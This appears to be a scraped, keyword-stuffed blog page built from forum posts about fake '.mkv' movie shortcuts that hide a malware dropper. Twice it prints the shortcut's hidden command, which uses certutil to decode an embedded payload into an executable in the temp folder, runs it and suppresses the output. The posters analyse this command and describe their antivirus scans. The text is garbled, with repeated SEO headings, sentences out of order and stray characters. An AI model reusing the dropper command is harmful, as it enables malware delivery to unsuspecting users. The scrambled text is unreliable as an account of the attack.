keronrisk.blogg.se

1. MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES INSTALL
2. MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES PATCH
3. MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES FULL
4. MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES CODE

So, the scammer takes their script - let's call it virus.bat and renames it .bat. Today, everybody wants don't they? MKV is the most common file extension for large movies.

They rename it to imitate a popular file that people want, but the extension is still executable.īack in the day, it was Britney_Spears_ or Windows.XP.

MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES INSTALL

Malicious person writes a script or compiles a malicious executable to install malware on your PC. This is a more elaborate version of the old scripting scams we used to see in the p2p days. I got this fricking far, understanding it. Now what does these files do ? i dont fricking know.

Its to run the command and then close the CMD window, and at the end there is >nul 2>&1 wich will make sure you wont see the prompt. It's not a dud, it's working like it's supposed to.

MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES CODE

I will gladly upload it with the code it should execute, to see what it does. So WHO would like to decompile the code of my exe file? These are just sending information to diffrent ip addresses or server. Wich would mean, either these are made by diffrent people. So interesting i got this "-pLRexKehnP769gW9aUe9EFI5S9D0e5KPj8J0y8ex2cdIJFKpi47ML9N" but it will be used to translate the last code -pdlM4WL48M8999aNbcNefLdi83VfgQNhfHIK47R64 This name.exe is not malware, and is fine. Then from the code you run and start %username.exe% wich is the exe you just created in this case called name.exe was because you were doing it wrong you should have.Ĭertutil -decode "" "name.exe" The Reason WHY you guys coulden decode it. The >nul suppresses output so that you can't see it. & start executes this executable and leaves it running, and also passes the string in the end to the executable for whatever purpose. Certutil decrypts the file and saves it to %TEMP% as a malicious. Let's analyze this script a bit: %comspec% /c launches cmd.exe which closes after running the commands. So, luckily this particular file was a dud. %COMSPEC% /k (certutil -decode "" "%TEMP%\%USERNAME%.exe" & start "%USERNAME%" /b "%TEMP%\%USERNAME%.exe" "-pdlM4WL48M8999aNbcNefLdi83VfgQNhfHIK47R64")ĭecodeFile returned The data is invalid. The link i received is virtually identical to yours: I don't see any malicious exe's running in memory.Īlso noticed this today. I ran Hijack this as well and process explorer but didn't find any executables that were fishy.Įdit: looks like I got lucky and my AV shutdown the exe after it was decoded to my windows temp directory.I hope. I suppose it could be a 0-day but Eset is a pretty good AV.

MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES PATCH

mkv.lnk.ĭoes anyone know what the purpose of these malicious files are? Perhaps I had a windows patch that prevented it or my Avira prevented it, but doesn't have anything saying it prevented a virus in the logs that I can find. Can't find anything when i google search for. I then scanned the file (which was too big for virus total) with each of my AV programs, and they don't detect anything.

MKV WINDOWS NOT SHOWING FILE DETAILS JUST FOR SOME FILES FULL

Eset did pick up a few items on a full scan, but nothing running in memory. I also ran a scan with Microsoft Security Essentials and it found nothing. I ran an Avira scan which found nothing, then installed Eset Nod32, and malware bytes. I accidentally clicked on one and thought I hosed myself, but nothing seemed to happen. So it's for sure trying to extract a payload on your computer. %COMSPEC% /c (certutil -decode ".mkv.lnk" "%TEMP%\%USERNAME%.exe" & start "%USERNAME%" /b "%TEMP%\%USERNAME%.exe" "-p1YNO0IIxem49sn7de578itJQQaahbckbdhej7fdM") >nul 2>&1 If you right click on it and choose properties the target is They seem to have a run code that is supposed to create an executable in something like your user/temp directory.